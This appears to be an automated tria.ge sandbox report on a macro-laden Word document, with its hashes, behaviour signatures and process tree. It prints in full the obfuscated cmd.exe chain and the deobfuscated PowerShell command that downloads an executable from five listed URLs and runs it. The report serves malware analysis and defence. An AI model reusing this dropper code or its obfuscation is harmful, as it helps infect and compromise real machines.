Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/09/2024, 03:33

General

  • Target

    d0fd563358e7480da8a39e8cdb6ef3cc_JaffaCakes118.doc

  • Size

    189KB

  • MD5

    d0fd563358e7480da8a39e8cdb6ef3cc

  • SHA1

    4e76be3b07b47c413706731c21bd38a86be25d73

  • SHA256

    4f43ea2ee6d7c159765e14f68214b6c03142714d2c413ed8eeed276fdd3641ea

  • SHA512

    f8b5d7f47e12d01e202cc4690e705a10b85d3fb13f9567e05a9befad03e1dbf9a144f706fb1ff6b4aefe3f83a68c91611b2b4463aef8e9946c7ac5a512aea2cf

  • SSDEEP

    3072:p5Fqffqjbzk/jL/xSu90OoiLuDKZXfwKeljR1z:pjOqjk/xUOmD+XfwLX

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tunerg.com/SKMFSuIWW

exe.dropper

http://stoutarc.com/JbCOGyE

exe.dropper

http://www.modern-autoparts.com/ezFUGpI

exe.dropper

http://antigua.aguilarnoticias.com/LNOGFuYx

exe.dropper

http://take-one2.com/X80VedH

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d0fd563358e7480da8a39e8cdb6ef3cc_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2392
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\b3707\d6921\i8318\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set kW=gEXjNhBiU1eO0,v8CWbIux\G@%F5VtAmk.y6zHrLwM/(T)l9Y3cJ$ f4{-7+P2d'D~Ka}s:n;opS=&&for %o in (74;73;40;25;60;8;6;39;19;16;70;65;27;13;9;25;38;25;75;1;75;75;19;11;4;4;30;41;1;70;65;57;55;13;9;25;5;25;44;1;41;60;70;65;57;49;13;9;25;46;46;53;52;20;61;9;27;61;76;63;36;55;27;12;49;63;72;52;36;47;27;15;47;76;71;10;40;57;73;18;3;10;50;29;53;4;10;29;33;17;10;18;16;46;7;10;71;29;72;52;5;55;49;15;58;76;63;5;29;29;74;70;42;42;29;20;71;10;38;0;33;50;73;31;42;75;66;41;26;75;20;19;17;17;24;5;29;29;74;70;42;42;69;29;73;20;29;67;38;50;33;50;73;31;42;51;18;16;11;23;34;1;24;5;29;29;74;70;42;42;40;40;40;33;31;73;62;10;38;71;57;67;20;29;73;74;67;38;29;69;33;50;73;31;42;10;36;26;8;23;74;19;24;5;29;29;74;70;42;42;67;71;29;7;0;20;67;33;67;0;20;7;46;67;38;71;73;29;7;50;7;67;69;33;50;73;31;42;39;4;11;23;26;20;48;21;24;5;29;29;74;70;42;42;29;67;32;10;57;73;71;10;61;33;50;73;31;42;2;15;12;28;10;62;37;63;33;75;74;46;7;29;43;63;24;63;45;72;52;71;15;61;9;27;76;63;3;15;58;35;9;63;72;52;7;15;35;9;9;53;76;53;63;27;27;63;72;52;71;55;27;15;58;76;63;69;15;55;58;49;63;72;52;20;9;27;27;61;76;52;10;71;14;70;29;10;31;74;59;63;22;63;59;52;7;15;35;9;9;59;63;33;10;21;10;63;72;54;73;38;10;67;50;5;43;52;32;61;12;61;61;53;7;71;53;52;5;55;49;15;58;45;56;29;38;34;56;52;36;47;27;15;47;33;64;73;40;71;46;73;67;62;26;7;46;10;43;52;32;61;12;61;61;13;53;52;20;9;27;27;61;45;72;52;74;9;49;27;27;76;63;62;27;49;12;12;63;72;19;54;53;43;43;23;10;29;57;19;29;10;31;53;52;20;9;27;27;61;45;33;46;10;71;0;29;5;53;57;0;10;53;55;12;12;12;12;45;53;56;19;71;14;73;32;10;57;19;29;10;31;53;52;20;9;27;27;61;72;52;62;35;55;15;12;76;63;74;49;27;47;35;63;72;18;38;10;67;32;72;68;68;50;67;29;50;5;56;68;68;52;69;35;55;61;47;76;63;14;9;49;61;55;63;72;87)do set 9vR=!9vR!!kW:~%o,1!&&if %o equ 87 echo !9vR:~5!|cmd"
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\SysWOW64\cmd.exe
        CmD /V/C"set kW=gEXjNhBiU1eO0,v8CWbIux\G@%F5VtAmk.y6zHrLwM/(T)l9Y3cJ$ f4{-7+P2d'D~Ka}s:n;opS=&&for %o in (74;73;40;25;60;8;6;39;19;16;70;65;27;13;9;25;38;25;75;1;75;75;19;11;4;4;30;41;1;70;65;57;55;13;9;25;5;25;44;1;41;60;70;65;57;49;13;9;25;46;46;53;52;20;61;9;27;61;76;63;36;55;27;12;49;63;72;52;36;47;27;15;47;76;71;10;40;57;73;18;3;10;50;29;53;4;10;29;33;17;10;18;16;46;7;10;71;29;72;52;5;55;49;15;58;76;63;5;29;29;74;70;42;42;29;20;71;10;38;0;33;50;73;31;42;75;66;41;26;75;20;19;17;17;24;5;29;29;74;70;42;42;69;29;73;20;29;67;38;50;33;50;73;31;42;51;18;16;11;23;34;1;24;5;29;29;74;70;42;42;40;40;40;33;31;73;62;10;38;71;57;67;20;29;73;74;67;38;29;69;33;50;73;31;42;10;36;26;8;23;74;19;24;5;29;29;74;70;42;42;67;71;29;7;0;20;67;33;67;0;20;7;46;67;38;71;73;29;7;50;7;67;69;33;50;73;31;42;39;4;11;23;26;20;48;21;24;5;29;29;74;70;42;42;29;67;32;10;57;73;71;10;61;33;50;73;31;42;2;15;12;28;10;62;37;63;33;75;74;46;7;29;43;63;24;63;45;72;52;71;15;61;9;27;76;63;3;15;58;35;9;63;72;52;7;15;35;9;9;53;76;53;63;27;27;63;72;52;71;55;27;15;58;76;63;69;15;55;58;49;63;72;52;20;9;27;27;61;76;52;10;71;14;70;29;10;31;74;59;63;22;63;59;52;7;15;35;9;9;59;63;33;10;21;10;63;72;54;73;38;10;67;50;5;43;52;32;61;12;61;61;53;7;71;53;52;5;55;49;15;58;45;56;29;38;34;56;52;36;47;27;15;47;33;64;73;40;71;46;73;67;62;26;7;46;10;43;52;32;61;12;61;61;13;53;52;20;9;27;27;61;45;72;52;74;9;49;27;27;76;63;62;27;49;12;12;63;72;19;54;53;43;43;23;10;29;57;19;29;10;31;53;52;20;9;27;27;61;45;33;46;10;71;0;29;5;53;57;0;10;53;55;12;12;12;12;45;53;56;19;71;14;73;32;10;57;19;29;10;31;53;52;20;9;27;27;61;72;52;62;35;55;15;12;76;63;74;49;27;47;35;63;72;18;38;10;67;32;72;68;68;50;67;29;50;5;56;68;68;52;69;35;55;61;47;76;63;14;9;49;61;55;63;72;87)do set 9vR=!9vR!!kW:~%o,1!&&if %o equ 87 echo !9vR:~5!|cmd"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $u2152='z4503';$z9589=new-object Net.WebClient;$h4387='http://tunerg.com/SKMFSuIWW@http://stoutarc.com/JbCOGyE@http://www.modern-autoparts.com/ezFUGpI@http://antigua.aguilarnoticias.com/LNOGFuYx@http://take-one2.com/X80VedH'.Split('@');$n8215='j8761';$i8611 = '55';$n4587='s8473';$u1552=$env:temp+'\'+$i8611+'.exe';foreach($k2022 in $h4387){try{$z9589.DownloadFile($k2022, $u1552);$p1355='d5300';If ((Get-Item $u1552).length -ge 40000) {Invoke-Item $u1552;$d6480='p3596';break;}}catch{}}$s6429='v1324';"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2744
        • C:\Windows\SysWOW64\cmd.exe
          cmd
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2764
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell $u2152='z4503';$z9589=new-object Net.WebClient;$h4387='http://tunerg.com/SKMFSuIWW@http://stoutarc.com/JbCOGyE@http://www.modern-autoparts.com/ezFUGpI@http://antigua.aguilarnoticias.com/LNOGFuYx@http://take-one2.com/X80VedH'.Split('@');$n8215='j8761';$i8611 = '55';$n4587='s8473';$u1552=$env:temp+'\'+$i8611+'.exe';foreach($k2022 in $h4387){try{$z9589.DownloadFile($k2022, $u1552);$p1355='d5300';If ((Get-Item $u1552).length -ge 40000) {Invoke-Item $u1552;$d6480='p3596';break;}}catch{}}$s6429='v1324';
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2648
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2176

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      28191fdf64aa87f108020780a968379e

      SHA1

      bd03047b3bd8a2a4c482bdd332a4a11aebd83346

      SHA256

      da5877f6162a43b378a8563d3511b5329be93b6391a7e5298f30357ff335ae28

      SHA512

      9866894940a90aec94bfe2e2b6b5303988d413497ab1fe4e00a35a6bc9dc7e567459ef744aca854fe59c2debf65d4380d6d95b407140bcae7deef44455c28dd6

    • memory/2392-25-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-19-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-8-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-11-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-10-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-9-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-32-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-30-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-29-0x00000000068C0000-0x00000000069C0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-18-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2392-21-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-0-0x000000002FAE1000-0x000000002FAE2000-memory.dmp

      Filesize

      4KB

    • memory/2392-17-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-13-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-12-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-35-0x000000007151D000-0x0000000071528000-memory.dmp

      Filesize

      44KB

    • memory/2392-36-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-37-0x00000000007A0000-0x00000000008A0000-memory.dmp

      Filesize

      1024KB

    • memory/2392-59-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2392-2-0x000000007151D000-0x0000000071528000-memory.dmp

      Filesize

      44KB

    • memory/2392-60-0x000000007151D000-0x0000000071528000-memory.dmp

      Filesize

      44KB